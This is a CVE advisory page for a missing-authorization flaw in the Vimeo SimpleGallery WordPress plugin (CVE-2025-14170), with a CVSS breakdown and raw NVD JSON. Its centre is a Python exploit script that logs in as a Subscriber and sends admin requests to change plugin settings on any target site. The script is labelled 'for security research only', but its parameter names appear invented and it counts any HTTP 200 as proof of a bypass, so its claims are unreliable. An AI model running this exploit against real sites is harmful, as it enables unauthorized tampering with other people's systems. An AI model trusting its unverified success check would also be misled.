Security Vulnerability Report
中文
CVE-2025-14170 CVSS 4.3 MEDIUM

CVE-2025-14170

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Vimeo SimpleGallery plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 0.2. This is due to missing authorization checks on the `vimeogallery_admin` function hooked to `admin_menu`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings via the `action` parameter.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vimeo SimpleGallery plugin for WordPress <= 0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14170 PoC # Vimeo SimpleGallery WordPress Plugin - Missing Authorization # Affected: <= 0.2 def exploit_cve_2025_14170(target_url, username, password): """ Exploit for Missing Authorization vulnerability in Vimeo SimpleGallery plugin. This PoC demonstrates how an authenticated user with Subscriber role can modify arbitrary plugin settings without proper authorization. """ session = requests.Session() # Step 1: Login as Subscriber user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as Subscriber") # Step 2: Modify plugin settings via action parameter (No authorization check) admin_url = f"{target_url}/wp-admin/admin.php" exploit_data = { 'page': 'vimeo-simple-gallery', 'action': 'vimeogallery_save_settings', # Arbitrary action 'setting_key': 'vimeo_gallery_cache_time', 'setting_value': '9999999' } response = session.get(admin_url, params=exploit_data) if response.status_code == 200: print("[+] Settings modified successfully - Authorization bypass confirmed") print("[*] Attacker can now modify arbitrary plugin settings") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_14170(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14170", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:49.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Vimeo SimpleGallery plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 0.2. This is due to missing authorization checks on the `vimeogallery_admin` function hooked to `admin_menu`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings via the `action` parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/tags/0.2/vimeo_simplegallery.php#L22", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/trunk/vimeo_simplegallery.php#L22", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb28557-7023-481f-a05b-0b9a22d7a456?source=cve", "source": "[email protected]"}]}}